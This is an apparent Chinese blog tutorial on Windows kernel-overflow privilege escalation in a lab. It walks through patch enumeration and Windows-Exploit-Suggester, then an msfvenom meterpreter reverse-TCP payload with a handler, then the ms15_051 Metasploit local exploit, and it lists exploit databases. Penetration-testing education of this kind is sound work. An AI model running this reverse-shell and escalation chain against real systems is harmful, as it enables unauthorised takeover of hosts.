首页 > 其他分享 >系统内核溢出漏洞提权

系统内核溢出漏洞提权

时间:2024-07-22 10:28:52浏览次数:13  
标签:www 漏洞 windows 提权 内核 https com 溢出

介绍

溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。
利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用该漏洞的关键是目标系统有没有及时安装补丁,如果目标系统没有安装某一漏洞的补丁且存在该漏洞的话,攻击者就会向目标系统上传本地溢出程序,溢出Administrator权限。


内核基本提权步骤

(1)信息收集,例如查看当前权限,查看版本、补丁等
(2)根据收集到的信息确定可利用漏洞
(3)根据漏洞查找EXP
(4)使用EXP提权

查看当前权限

whoami
whoami /groups

image.png

查看目标系统上安装了那些补丁

systeminfo
wmic qfe get caption,description,hotfixid,installedon

image.png
环境使用的03系统
image.png
只有管理员才能使用wmic
环境是没有打补丁的 ,因此可以说漏洞比较多的。

windows exploit suggester提权

Windows-Exploit-Suggester是一款提权辅助工具
地址: https://github.com/GDSSecurity/Windows-Exploit-Suggester
使用方法

先更新
python2 windows-exploit-suggester.py --update 

再查找   这里的systeminfo.txt 是靶机导出的
python2 windows-exploit-suggester.py --database xls文件名 --systeminfo
systeminfo.txt

image.png
导出的内容
image.png
使用

python2 windows-exploit-suggester.py -d  2023-04-26-mssb.xls --systeminfo systeminfo.txt

执行后,会给出目标系统存在的漏洞

在线辅助提权工具

https://i.hacking8.com/tiquan
https://patchchecker.com/

提权EXP寻找

https://github.com/offensive-security/exploitdb
https://www.exploit-db.com
https://github.com/Heptagrams/Heptagram/tree/master/Windows/Elevation

MSF提权

先生成一个shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.145.130 LPORT=4444 -f exe > shell.exe

image.png
然后放在靶机上面
image.png
先获取shell

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost  192.168.145.130
run

image.png
使用Meterpreter中执行如下命令即可查看系统补丁信息

run post/windows/gather/enum_patches

image.png
搜索可以提权的漏洞

image.png
存在+ 号的一般都是可以利用的
使用获得的提权漏洞所对应的模块

use exploit/windows/local/ms15_051_client_copy_image
set session 2
run

image.png
这样就提权成功了

获取EXP / POC

得知某个漏洞MS/CVE编号后可以去Baidu、Google、Twitter、Facebook、Github、Exploit-db等网站去查找漏洞详情及POC/EXP。
安全漏洞库:

https://nvd.nist.gov
http://cve.scap.org.cn
https://www.seebug.org
https://www.cnvd.org.cn
http://www.cnnvd.org.cn
https://www.securityfocus.com
http://www.nsfocus.net/vulndb
https://msrc.microsoft.com/update-guide

KB、POC、EXP查找:

https://0day.today
https://www.exploit-db.com
http://kernelhub.ascotbe.com
https://github.com/Ascotbe/Kernelhub
https://github.com/qazbnm456/awesome-cve-poc
https://github.com/SecWiki/windows-kernel-exploits
https://www.catalog.update.microsoft.com/home.aspx

参考:

https://xz.aliyun.com/t/8292#toc-6
https://www.zhihu.com/tardis/zm/art/331715854?source_id=1003
https://www.bmabk.com/index.php/post/89050.html
https://www.cnblogs.com/MGh0st/p/16546267.html
https://www.freebuf.com/vuls/350343.html#%C2%A0%20%C2%A0windows%E5%86%85%E6%A0%B8%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83

标签:www,漏洞,windows,提权,内核,https,com,溢出
From: https://blog.csdn.net/qq_52579508/article/details/140602825

相关文章

  • 内核模块高级-多文件编译、加载、参数传递、模块依赖
    多文件编译    对于比较复杂的驱动程序,常常会把它的功能进行拆分,由不同的文件实现,这样也能进行并行开发,缩短开发周期。多文件编译的简单例子如下:mod.c://mod.c#include<linux/init.h>#include<linux/module.h>#include"ext.h"//其他文件的头文件ext.hstatic......
  • Linux工作原理5内核如何启动
    5内核如何启动现在你已经知道了Linux系统的物理和逻辑结构、什么是内核以及如何使用进程。本章将向你介绍内核是如何启动的。换句话说,你将学习内核如何移动到内存中,以及在第一个用户进程启动之前内核所做的工作。启动过程的简化视图如下:机器的BIOS或引导固件加载并运行引导......
  • linux 内核功能编译为模块
    在内核配置过程中,makemenuconfig工具提供了一个用户友好的图形化界面,用于选择和配置内核功能。配置选项中的<M>意味着将该功能作为模块(module)来编译。内核配置选项解释在makemenuconfig中,有三种主要的选项来配置内核功能:[]excluded:表示功能被排除在内核之外,即不会被......
  • NVIDIA全面转向开源GPU内核模块
      每周跟踪AI热点新闻动向和震撼发展想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领域的领跑者。点击订阅,与未来同行!订阅:https://......
  • 查看电脑内核及线程数量
    1.第一种方法:进入电脑:win+r进入命令提示符号界面输入:wmic进入命令行界面1.1cpugetNumberOfCores内核数量1.2cpugetnumberoflogicalProcessors线程数量1.3查看电脑处理器发现是20核,比14核多了6核心,是因为超线程技术的原因;超线程技术把多线程处理器内部的两......
  • 单链表,双链表和内核链表的比较
    首先贴上几个链接,来自一些大佬,这些文章详细易懂,可以帮助我们快速全面了解单双链表以及Linux内核链表list.h。1.C语言链表超详解;作者:rivencode;图文并茂,炒鸡详细2.链表基础知识详解;作者:不秃也很强;代码详细,条理清晰3.拒绝造轮子!如何移植并使用Linux内核的通用链表(附完整代码实现);作......
  • 记一次VMware 虚拟机遇到意外重启的内核级排查操作
    背景:用户业务虚拟机遇到不明原因导致操作系统重启,引起业务中断需求:要求排查具体原因,定位问题根源先来查看虚拟机的事件,事件发生时间:13:37:21 再到虚拟机对应的宿主机查看相关日志,宿主机日志看到的时间需+8才能与VCenter上的事件时间对应得上,因此我们过滤05:37分左右的日志......
  • 内核配置
    https://developer.aliyun.com/article/536805https://help.aliyun.com/zh/ecs/support/common-kernel-network-parameters-of-ecs-linux-instances-and-faq-hosts:allgather_facts:nobecome:yestasks:#-name:Insertcontentbelowaspecificline#......
  • Linux 提权-NFS 共享
    本文通过Google翻译NFSShareno_root_squash–LinuxPrivilegeEscalation这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。导航0前言1什么是NFS共享?2外部枚举NFS共享2.1使用Nmap枚举NFS共享2.2枚举NFS共享2.3......
  • 在Linux中,编译内核的意义与步骤?
    在Linux系统中,编译内核是一个重要的操作,它允许用户根据自己的硬件配置和需求定制内核。以下是编译内核的意义和步骤的详细说明:1.编译内核的意义定制化:用户可以根据自己的硬件和需求选择内核的配置选项,从而优化系统性能。安全性:通过编译内核,可以去除不需要的模块和功能,减少潜......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99